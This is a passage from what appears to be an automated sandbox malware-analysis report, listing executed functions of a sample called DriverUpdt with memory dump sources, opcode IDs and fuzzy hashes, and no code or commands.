                            • Instruction Fuzzy Hash: 8B51F732D1E5969ED741B77CA4511E93BB0FF82365F0802B7D188DB1D3DE1C184A87A8
                            Function 00007FF848F112B8 Relevance: .5, Instructions: 489COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000010.00000002.2672432966.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_16_2_7ff848f10000_DriverUpdt.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 5268909075b9c850386cca8dd71e804ef8f7637574f228cea80c3c20639308bb
                            • Instruction ID: 5115a1f45e32d7f191d1b9ccdfd44def6f392aaebd1bedcf936342d9ba21472e
                            • Opcode Fuzzy Hash: 5268909075b9c850386cca8dd71e804ef8f7637574f228cea80c3c20639308bb
                            • Instruction Fuzzy Hash: 1231B032D1D98A8FE781EB68D8651ED7BB1FF86351F4405B6D009E72D3DE281C4A8750
                            Function 00007FF848F10AFB Relevance: .2, Instructions: 209COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000010.00000002.2672432966.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_16_2_7ff848f10000_DriverUpdt.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: e50c13fd624a2532b9997a356b2546d93d05492ac3d9d6b680a85c503f9884dc
                            • Instruction ID: 04abbd87d11d32a690857259e8a3dd99e4296b63babcf22271d3967acbafffde
                            • Opcode Fuzzy Hash: e50c13fd624a2532b9997a356b2546d93d05492ac3d9d6b680a85c503f9884dc
                            • Instruction Fuzzy Hash: E051C636B1A52A9FD740FB6CA4516ED73A0FFD4365F40013AD508C72C3CF2C68458AA8
                            Function 00007FF848F10B6F Relevance: .2, Instructions: 162COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000010.00000002.2672432966.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_16_2_7ff848f10000_DriverUpdt.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: ce35542639bc4d8212d2199fd23fb07cd562979f28d56d71fc5e94e0651f60ac
                            • Instruction ID: a9025fb62be33843a53c7680186689b6c15489d2910126d6c85ed142d4f0824e
                            • Opcode Fuzzy Hash: ce35542639bc4d8212d2199fd23fb07cd562979f28d56d71fc5e94e0651f60ac
                            • Instruction Fuzzy Hash: E2410335B5992E9FDB44FB68D8916E977A1FFC4351F80053AD009D7282CE38A84ACB90
                            Function 00007FF848F10638 Relevance: .1, Instructions: 134COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000010.00000002.2672432966.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_16_2_7ff848f10000_DriverUpdt.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: c933ff0658774f2fceb2992ef1fbfc16ab3c2d8f39520785247184fffa51dc0e
                            • Instruction ID: 9f67053f120ce899112ec3ac39e076745ae4afea5d087f69fc68a29a32c39d04
                            • Opcode Fuzzy Hash: c933ff0658774f2fceb2992ef1fbfc16ab3c2d8f39520785247184fffa51dc0e
                            • Instruction Fuzzy Hash: F131D021B2D9491FE698EB6C946A379B6D2FBD8755F0405BEE00EC32D3DE289C428341
                            Function 00007FF848F10D48 Relevance: .1, Instructions: 85COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000010.00000002.2672432966.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_16_2_7ff848f10000_DriverUpdt.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 11f5b095ed79254e39a77f10772e4590249c2236fe1d6af200be9ad455b155b0
                            • Instruction ID: ed1b7de362936619157a2f2bf3f75e65a3f39ee7ea80ebbf6f403d636cdd2533
                            • Opcode Fuzzy Hash: 11f5b095ed79254e39a77f10772e4590249c2236fe1d6af200be9ad455b155b0
                            • Instruction Fuzzy Hash: 78215121B2991A9FFB84B7BC545A3BDB2D2EF98751F10017AE40DD32C6EE2C6C414355
                            Function 00007FF848F1086D Relevance: .1, Instructions: 77COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000010.00000002.2672432966.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_16_2_7ff848f10000_DriverUpdt.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 53293b52b52a23dce6d44392a936546fe74a3fe5e888982f7b8a4b59f6a6551a
                            • Instruction ID: f94fc3a5aa57112953f1ce4d07929fc1213104cde811bebc113d793e13ef84f8
                            • Opcode Fuzzy Hash: 53293b52b52a23dce6d44392a936546fe74a3fe5e888982f7b8a4b59f6a6551a
                            • Instruction Fuzzy Hash: C4217C356DA5496FD780FF2880D66FA7FB1FB88214FD04668D90EC3397DE286A048B51
                            Function 00007FF848F12291 Relevance: .0, Instructions: 46COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000010.00000002.2672432966.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_16_2_7ff848f10000_DriverUpdt.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 101efca0150798ede8f4b8e6c16a34858ce2a56c97e6e6b1b801b1da6871ee9b
                            • Instruction ID: 07f45a944b7ff5d405eadd153c6bf443762906a915a6e8dca36e47827aeba5c4
                            • Opcode Fuzzy Hash: 101efca0150798ede8f4b8e6c16a34858ce2a56c97e6e6b1b801b1da6871ee9b
                            • Instruction Fuzzy Hash: B301422090DAC10FF382B3B81C605797FE0DBD1391F0800ABD888C60D7DA189D4483A6

                            Executed Functions

                            Function 00007FF848F116E9 Relevance: .7, Instructions: 703COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000014.00000002.2872206114.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_20_2_7ff848f10000_DriverUpdt.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 698d0d4433ba45e962f2f4a13b361b825ffb991575558d9c71b89744123c33e2
                            • Instruction ID: 3e56ea85ecd72b6b2c8db35d9270aa7b61562e02ad24b2df490a093f14b3b56a
                            • Opcode Fuzzy Hash: 698d0d4433ba45e962f2f4a13b361b825ffb991575558d9c71b89744123c33e2
                            • Instruction Fuzzy Hash: 9722A170A2DA599FE798FB2884597BA76D2FF88780F440579E40EC32C3DF28AC418745
                            Function 00007FF848F10E5E Relevance: .3, Instructions: 283COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000014.00000002.2872206114.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_20_2_7ff848f10000_DriverUpdt.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 16d41d374eb465322fcfbe36862df545cc642fe61bf62512de34120ca94fff72
                            • Instruction ID: 6f96bd937e44d45d31d758439a5a85d73b028074360a54d6367eafd9b0bde0a2
                            • Opcode Fuzzy Hash: 16d41d374eb465322fcfbe36862df545cc642fe61bf62512de34120ca94fff72
                            • Instruction Fuzzy Hash: D4710922A1E6965EE352B37C64151FA2BA1EF86774F0842BBD4CCCF193DE0C58878365
                            Function 00007FF848F120C1 Relevance: .2, Instructions: 207COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000014.00000002.2872206114.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_20_2_7ff848f10000_DriverUpdt.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: cbfc253a7466121b855d989de58525cda1fecb370951b493c4ab9d97402c587a
                            • Instruction ID: 35064742a1ae3e7b659304a19886804fa802bf8a7866535a24e0e7f1606cd967
                            • Opcode Fuzzy Hash: cbfc253a7466121b855d989de58525cda1fecb370951b493c4ab9d97402c587a
                            • Instruction Fuzzy Hash: 5851F020A5E6C55FD786EBB858242B5BFE1EF87369F0801FAE089C71D3DE180806C356
                            Function 00007FF848F107F2 Relevance: 2.7, Strings: 2, Instructions: 156COMMON
                            Download Yara Rule
                            Strings
                            Memory Dump Source
                            • Source File: 00000014.00000002.2872206114.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_20_2_7ff848f10000_DriverUpdt.jbxd
                            Similarity
                            • API ID:
                            • String ID: ;O_$<O_^
                            • API String ID: 0-3431308889
                            • Opcode ID: fb41de854240ba38326c50718073c637f8350d1875667ea7371585b4a567cba5
                            • Instruction ID: b5e193a1116492f6e8597370e6372d659c30129c365dfcd31480d6c2bdfcf6c4
                            • Opcode Fuzzy Hash: fb41de854240ba38326c50718073c637f8350d1875667ea7371585b4a567cba5
                            • Instruction Fuzzy Hash: 4A51E336A5F61A9FD341FB6CE4A11EA3BB0FF843A5F544176D0488B383DE2C68468794
                            Function 00007FF848F111F2 Relevance: 1.8, Strings: 1, Instructions: 584COMMON
                            Download Yara Rule
                            Strings
                            Memory Dump Source
                            • Source File: 00000014.00000002.2872206114.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_20_2_7ff848f10000_DriverUpdt.jbxd
                            Similarity
                            • API ID:
                            • String ID: 2O_^
                            • API String ID: 0-2974816419
                            • Opcode ID: acff747772b12b820c96a93ff245ada22c71f29a0ecc3334cc146195d8347561
                            • Instruction ID: 686c9a055fd6a27a4fa09f4ef4e4ead42dd96f39d6d6da4f5954f799c4ccbad5
                            • Opcode Fuzzy Hash: acff747772b12b820c96a93ff245ada22c71f29a0ecc3334cc146195d8347561
                            • Instruction Fuzzy Hash: 3451D532D1E9969ED741B77CA8611EA7BB0FF86365F0801B6C188DB193DE1C184A87A4
                            Function 00007FF848F111F0 Relevance: 1.8, Strings: 1, Instructions: 580COMMON
                            Download Yara Rule
                            Strings
                            Memory Dump Source
                            • Source File: 00000014.00000002.2872206114.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_20_2_7ff848f10000_DriverUpdt.jbxd
                            Similarity
                            • API ID:
                            • String ID: 2O_^
                            • API String ID: 0-2974816419
                            • Opcode ID: 3972620c7bedc3160be378d7fb758b9e39c4304dedeef95c0fe4f1f1aef22bb9
                            • Instruction ID: 9af1b66cfc84e5c1fff3276b350f6c8467df5c45fd10c6058c41297a48f0286c
                            • Opcode Fuzzy Hash: 3972620c7bedc3160be378d7fb758b9e39c4304dedeef95c0fe4f1f1aef22bb9
                            • Instruction Fuzzy Hash: 4D51F732D1E5969ED741B77CA8511E93BB0FF86365F0802B7C188DB1D3DE1C188A87A8
                            Function 00007FF848F112B8 Relevance: .5, Instructions: 489COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000014.00000002.2872206114.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_20_2_7ff848f10000_DriverUpdt.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 10e85a45b2c5612ef24d4654ada8044f8388bcbc4c9d4decab5acdf261d70b22
                            • Instruction ID: 656b054e37822d12dc26f5d9a326f6a481d7883fef5d9fa2da9bee940f9aab1b
                            • Opcode Fuzzy Hash: 10e85a45b2c5612ef24d4654ada8044f8388bcbc4c9d4decab5acdf261d70b22
                            • Instruction Fuzzy Hash: 6731B032D1D98A8FD781EB68D8651ED7BB1FF8A351F4405B6C009E72D3DE281C4A8750
                            Function 00007FF848F10AFB Relevance: .2, Instructions: 209COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000014.00000002.2872206114.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_20_2_7ff848f10000_DriverUpdt.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 1b0fcd8a860fb721531f1d292c7bdeeaf1b4ce31c67495bbf7113969ec0bb765
                            • Instruction ID: fa1fb744f829c42d55b735834570bc38dc015202f4962bb28ace9aa440e389ef
                            • Opcode Fuzzy Hash: 1b0fcd8a860fb721531f1d292c7bdeeaf1b4ce31c67495bbf7113969ec0bb765
                            • Instruction Fuzzy Hash: D551C136B1A52A9FD740FB6CA4516ED73A0FFD4365F40013AD108CB283DF2D688587A8
                            Function 00007FF848F10B6F Relevance: .2, Instructions: 162COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000014.00000002.2872206114.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_20_2_7ff848f10000_DriverUpdt.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 20f156148d3a0f4f8f9b220a381913cb6200e66028e267c435408a8a9a15a9b2
                            • Instruction ID: 081574550d0fcda3b2dbae6614300b5418b9074198cb1dea673df67318cbd32c
                            • Opcode Fuzzy Hash: 20f156148d3a0f4f8f9b220a381913cb6200e66028e267c435408a8a9a15a9b2
                            • Instruction Fuzzy Hash: 5441D235B1A92A9FDB44FB6CD8516ED77A1FFC8352F40053AD008D7282DE39A8468794
                            Function 00007FF848F10638 Relevance: .1, Instructions: 134COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000014.00000002.2872206114.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_20_2_7ff848f10000_DriverUpdt.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 93d0e1f81fbe8a7b943a574d79b9f03b8b8f058a3b1a177fb4e3b595c22ad074
                            • Instruction ID: b8b942f3afd854e2767b3325157e1d9c56d25268a9d599beeed6da97cd3041a2
                            • Opcode Fuzzy Hash: 93d0e1f81fbe8a7b943a574d79b9f03b8b8f058a3b1a177fb4e3b595c22ad074
                            • Instruction Fuzzy Hash: 2531D221B2D9491FE698EB6C946A379B6D2FBD8755F0405BEE00EC32D3DE289C418341
                            Function 00007FF848F10D48 Relevance: .1, Instructions: 85COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000014.00000002.2872206114.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_20_2_7ff848f10000_DriverUpdt.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 11f5b095ed79254e39a77f10772e4590249c2236fe1d6af200be9ad455b155b0
                            • Instruction ID: ed1b7de362936619157a2f2bf3f75e65a3f39ee7ea80ebbf6f403d636cdd2533
                            • Opcode Fuzzy Hash: 11f5b095ed79254e39a77f10772e4590249c2236fe1d6af200be9ad455b155b0
                            • Instruction Fuzzy Hash: 78215121B2991A9FFB84B7BC545A3BDB2D2EF98751F10017AE40DD32C6EE2C6C414355
                            Function 00007FF848F1086D Relevance: .1, Instructions: 77COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000014.00000002.2872206114.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_20_2_7ff848f10000_DriverUpdt.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 7b84d5aba3bcf5feded68bfd6f4767c8581b5105cf155a532b6d057b2f52631f
                            • Instruction ID: b9b1f0067f898ca26498f2f4c864ab6c5c957924663a4105b86523289c13f611
                            • Opcode Fuzzy Hash: 7b84d5aba3bcf5feded68bfd6f4767c8581b5105cf155a532b6d057b2f52631f
                            • Instruction Fuzzy Hash: 58216B7565B5095FD741EF58C0A16EE7FB1FB88281B804564D408C3387DE2C6A0187A0
                            Function 00007FF848F12291 Relevance: .0, Instructions: 46COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000014.00000002.2872206114.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_20_2_7ff848f10000_DriverUpdt.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 693fa520d436c86070e05db085e3cdb6476747d5b6aecc97b9d49130a15510d4
                            • Instruction ID: 59dcb084a93769008a049b50f83bf3616fb06bf0eb187fc227ee8e758b39ac3e
                            • Opcode Fuzzy Hash: 693fa520d436c86070e05db085e3cdb6476747d5b6aecc97b9d49130a15510d4
                            • Instruction Fuzzy Hash: D401426090DAC10FF382B3B818605797FE0DBD5391F0800ABD888C70D7DA18AD4483A6